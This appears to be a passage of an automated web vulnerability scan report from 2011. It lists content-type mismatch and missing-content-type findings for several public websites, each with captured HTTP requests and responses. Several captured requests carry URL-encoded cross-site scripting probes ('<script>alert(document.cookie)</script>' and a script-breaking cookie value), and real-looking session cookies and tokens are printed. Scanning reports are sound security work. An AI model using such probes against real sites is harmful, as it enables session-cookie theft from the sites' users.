HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:03 GMT
Server:
Last-Modified: Sun, 16 Jan 2011 16:36:12 GMT
Accept-Ranges: bytes
Content-Length: 894
Expires: Thu, 15 Apr 2045 20:00:00 GMT
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$`[$fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)fa)lg.lg.lg.lg.lg.lg.lg.lg.lg..|L.~Nlg.lg.lg.
...[SNIP]...

34.114. http://www.reimage.com/lp/nhome/css/fonts/candelabook-webfont.woff previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reimage.com
Path:	/lp/nhome/css/fonts/candelabook-webfont.woff

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /lp/nhome/css/fonts/candelabook-webfont.woff HTTP/1.1
Host: www.reimage.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=tr00qdoq010dhkbjc6ke2ogs54; _language=english; _tracking=Neudesic69f18; _campaign=direct; _adgroup=direct; _keyword=direct; _ads=direct; _visit=1; _trackid=12484382; _visitnum=1

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:28:54 GMT
Server:
Last-Modified: Sun, 23 Jan 2011 13:03:07 GMT
Accept-Ranges: bytes
Content-Length: 30632
Content-Type: text/plain; charset=UTF-8

wOFF......w.................................FFTM............X..qGDEF........... ....GPOS.......#........GSUB....... ... l.t.OS/2.......T...`e5..cmap...h...z......A.cvt ......."..."...Jfpgm...........e
...[SNIP]...

34.115. http://www.scientificamerican.com/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/3739f210-118f-4d28-be3f-86746b0e6aa8-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "12e0315-6180-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 24960
Date: Sun, 30 Jan 2011 17:14:48 GMT
X-Varnish: 1916371465 1916363808
Age: 252
Via: 1.1 varnish
Connection: keep-alive

wOFF......a..............._.................GPOS...X..%...iX=.iOS/2..&....Y...`~.eWcmap..'X...4..../...cvt ..(....H......
.fpgm..(....7....s.#.gasp..-.............glyf..-...*...K....Ahead..W....6...6
...[SNIP]...

34.116. http://www.scientificamerican.com/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/53a8cf2e-6421-4292-852f-a282ba53459d-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "79100e-d0cd-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 53453
Date: Sun, 30 Jan 2011 17:14:48 GMT
X-Varnish: 1916371472 1916363661
Age: 256
Via: 1.1 varnish
Connection: keep-alive

wOFF.......................(................GPOS..........DfC.w.GSUB.......... ..`^tLTSH...x.......:....OS/2.......V...`~...VDMX...T...t....l.t.cmap.......r.......bcvt ..!<.......... .fpgm..!X.......s
...[SNIP]...

34.117. http://www.scientificamerican.com/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /assets/fonts/bf15443a-6bf6-4af1-8887-d46d68cbb4b6-3 HTTP/1.1
Host: www.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 22 Sep 2010 01:39:07 GMT
ETag: "791009-6614-490cf3617c4c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 26132
Date: Sun, 30 Jan 2011 12:28:09 GMT
X-Varnish: 462261573 462254861
Age: 241
Via: 1.1 varnish
Connection: keep-alive

wOFF......f...............dd................GPOS...X..*P..u....cOS/2..+....Y...`}-fOcmap..,....4..../...cvt ..-8...K......
.fpgm..-....7....s.#.gasp..1.............glyf..1...*...LP..L4head..\....6...6
...[SNIP]...

34.118. http://www.scout.com/webproxy.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scout.com
Path:	/webproxy.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /webproxy.ashx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:36 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 50

The 'URL' query string parameter must be supplied.

34.119. http://www.silverlight.net/resources/script/omniture/analyticsid.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.silverlight.net
Path:	/resources/script/omniture/analyticsid.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /resources/script/omniture/analyticsid.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=dffchm455phi2oqm1taknp3x

Response

34.120. http://www.tigerdirect.com/secure/captcha/JpegImage.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/secure/captcha/JpegImage.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg; charset=utf-8

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /secure/captcha/JpegImage.aspx HTTP/1.1
Host: www.tigerdirect.com
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/secure/captcha/Default.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pop%5Fcheck=active; visited=tempyes; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393796d4%27%253balert%28document%2Ecookie%29%2F%2F5a2dd2f7153&Referer=; SessionId=2663007120110130101436173193214243; SSLB=0; SRCCODE=WEB1101; SRVR=WEBX12%2D06B; ASP.NET_SessionId=kjgyls45inwxcw55ezidnd45; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44&CaptchaTextVal=9895C6C99F6C

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/jpeg; charset=utf-8
Content-Length: 7487
Date: Sun, 30 Jan 2011 15:14:42 GMT
Connection: close

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......d...."..............................
...[SNIP]...

34.121. http://www.w3.org/TR/1999/REC-html401-19991224/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR/1999/REC-html401-19991224/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/1999/REC-html401-19991224/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.122. http://www.w3.org/TR/html4/strict.dtd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR/html4/strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/html4/strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

34.123. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.w3.org
Path:	/TR/xhtml1/DTD/xhtml1-strict.dtd

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/xhtml1/DTD/xhtml1-strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:56:14 GMT
Server: Apache/2
Content-Location: xhtml1-strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Thu, 01 Aug 2002 13:56:03 GMT
ETag: "6380-3a726d58522c0;475d1b7e9a540"
Accept-Ranges: bytes
Content-Length: 25472
Cache-Control: max-age=7776000
Expires: Fri, 29 Apr 2011 23:56:14 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
Extensible HTML version 1.0 Strict DTD

This is the same as HTML 4 Strict except for
changes due to the differences between XML and SGML.

Namespace = http://www.w3.org/1999/xhtml

...[SNIP]...

35. Content type is not specified previous
There are 5 instances of this issue:

http://l.player.ooyala.com/errors/report
http://l.player.ooyala.com/verify
https://login.live.com/hiphelp.srf
http://news.ycombinator.com/newest
http://news.ycombinator.com/news

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

35.1. http://l.player.ooyala.com/errors/report previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.player.ooyala.com
Path:	/errors/report

Request

GET /errors/report?log=bXNnPTEwMjEwOTYyJTIwV0FSTklORyUyMCUzRSUzRSUyMERhdGElMjBmb3IlMjBpbnN0YW5jZSUyMGluZm8lMjBmYWlsdXJlJTNBJTIwc3VmZml4JTNEaW5mbyUyNTJGcHJpbWFyeSUyNTJGJTI2dmVyc2lvbiUzRFdJTiUyNTIwMTAlMjUyQzElMjUyQzEwMyUyNTJDMjAlMjZhdHRlbXB0JTNEMiUyNnJlYXNvbiUzRENvbm5lY3Rpb24lMjUyMHRpbWVvdXQlMjZvcyUzRFdpbmRvd3MlMjUyMFNlcnZlciUyNTIwMjAwOCUyNTIwUjIlMjZiYW5kd2lkdGglM0QyMDAwJTI2ZG9jVVJMJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnRlY2hub2xvZy5tc25iYy5tc24uY29tJTI1MkYlMjUzRjRhZDdhJTI1MjUyMiUyNTI1M0UlMjUyNTNDc2NyaXB0JTI1MjUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklMjUyNTNDJTI1MkZzY3JpcHQlMjUyNTNFNWFhMWVhNDViM2ElMjUzRDElMjZwbGF5ZXJVUkwlM0RodHRwJTI1M0ElMjUyRiUyNTJGYWsuYy5vb3lhbGEuY29tJTI1MkZjYWNoZWFibGUlMjUyRjhmMTBlZmYzZTI5ZGUwZWZjMzdjNWI4OThjNzE4YTQ4JTI1MkZwbGF5ZXJfdjIuc3dmJTI2YWxyZWFkeUhhc0luZm8lM0R0cnVlJTI2dHlwZSUzRFBsdWdJbiUyNmlzVG9wTGV2ZWwlM0R0cnVlJTI2dGltZUluTWludXRlcyUzRDIwJnVybD1odHRwJTNBJTJGJTJGdGVjaG5vbG9nLm1zbmJjLm1zbi5jb20lMkYlM0Y0YWQ3YSUyNTIyJTI1M0UlMjUzQ3NjcmlwdCUyNTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUyNTNDJTJGc2NyaXB0JTI1M0U1YWExZWE0NWIzYSUzRDEmbG9hZD0xMjk2MzkxNzA5JnBsYXk9MCZkb2N1bWVudFVybFVudHJ1c3RlZD1odHRwJTNBJTJGJTJGdGVjaG5vbG9nLm1zbmJjLm1zbi5jb20lMkYlM0Y0YWQ3YSUyNTIyJTI1M0UlMjUzQ3NjcmlwdCUyNTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUyNTNDJTJGc2NyaXB0JTI1M0U1YWExZWE0NWIzYSUzRDEmcm9vdD1kME1HZ3dNanJ0bTByU2VYOWJUYzI5SXBFMHpRUTFSaiZwY29kZT0xMWFtbzZxR3cyb3VjTjc4cFItQlliRHBDRVNr&ts=1296402006 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 15:39:12 GMT
Content-Length: 2
Connection: close
Expires: Sun, 30 Jan 2011 15:39:11 GMT
Cache-Control: no-cache

OK

35.2. http://l.player.ooyala.com/verify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.player.ooyala.com
Path:	/verify

Request

POST /verify?ts=1296391797455 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
x-verify: AwABAgwAFQsAAgAAAAJEQwsAAwAAABJESVNUUklDVE9GQ09MVU1CSUELAAQAAAAKV0FTSElOR1RPTggABgAF71cIAAf/9D6/CwAIAAAADzE3My4xOTMuMjE0LjI0MwYACQH/BgAKIogDAAsBCwAMAAAACy9hUnFNaVN1TDlJAAgACE1FXnQGAAkBaAsABAAAAA9aN2lwcVVuMnNxNWJod0kLAAUAAAACVVMLAAYAAABnaHR0cDovL3RlY2hub2xvZy5tc25iYy5tc24uY29tLz80YWQ3YSUyMiUzRSUzQ3NjcmlwdCUzRWFsZXJ0KGRvY3VtZW50LmNvb2tpZSklM0Mvc2NyaXB0JTNFNWFhMWVhNDViM2E9MQgAB01FXh0PAAoLAAAAAwAAABwxMWFtbzZxR3cyb3VjTjc4cFItQlliRHBDRVNrAAAAIGQwTUdnd01qcnRtMHJTZVg5YlRjMjlJcEUwelFRMVJqAAAAAW8PABQMAAAAAwMAAQUAAwABAgMAAgAAAwABAQAPAAwIAAAAAwAAADwAAAA8AAAAAAsADQAAABp2LVdJTl8xMC4xLjEwMy4yMCFyLWYhYy00MA8ACwwAAAAPAwABAAMAAhMIAAYAAAAAAAMAAQIDAAITCAAGAAAAAAADAAEBAwACAQgABgAAAAACABEBAgASAQADAAEAAwACAQgABgAAAAACABEBAgASAQADAAECAwACAQgABgAAAAACABEBAgASAQAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAAADQALAwgAAAABAwAEF8YLAA8AAAAPYWsuYy5vb3lhbGEuY29tAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAAADQALAwgAAAABBAAABE8LAA8AAAAMcC5vb3lhbGEuY29tCAAFAAADCAYADQABBgAOAwgAAA8ACwMAAAADAQACAwACCgwABQgAAgAAAAANAAsDCAAAAAEFAAABnQsADwAAABFwbGF5ZXIub295YWxhLmNvbQgABQAAAAEGAA0AAQYADgJ3AAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAANDQALAwgAAAACBAAAHNsCAADQ9ggABQAAAhIGAA0ABAYADgCHAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAACvDQALAwgAAAABBQAAAbQIAAUAAAFvBgANAAEGAA4BbwAADwALAwAAAAMBAAIDAAIKDAAFCAACAAAAEg0ACwMIAAAAAQQABXdMCAAFAAACPgYADQAHBgAOALQAAAMAAQIDAAISDAAQBgABAAMPAAIIAAAAAQAAChgAAAMAAQIDAAISDAAQBgABAAEPAAIIAAAAAQAAChwAAAMAAQIDAAISDAAQBgABAAIPAAIIAAAAAQAACksAAAMAAQIDAAISDAAQBgABAAYPAAIIAAAAAgAAAAkAAAAAAAADABEAAwASAQMADwEA&sig=f3wqn8exCAHzpdeN5179
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1

.

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 12:49:02 GMT
Content-Length: 2
Connection: close
Expires: Sun, 30 Jan 2011 12:49:01 GMT
Cache-Control: no-cache

OK

35.3. https://login.live.com/hiphelp.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/hiphelp.srf

Request

GET /hiphelp.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H54 V: 0
Date: Sat, 29 Jan 2011 23:13:20 GMT
Connection: close

404 Not Found

35.4. http://news.ycombinator.com/newest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.ycombinator.com
Path:	/newest

Request

Response

35.5. http://news.ycombinator.com/news previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.ycombinator.com
Path:	/news

Request

Response

Report generated by CloudScan Vulnerability Crawler at Mon Jan 31 09:52:09 CST 2011.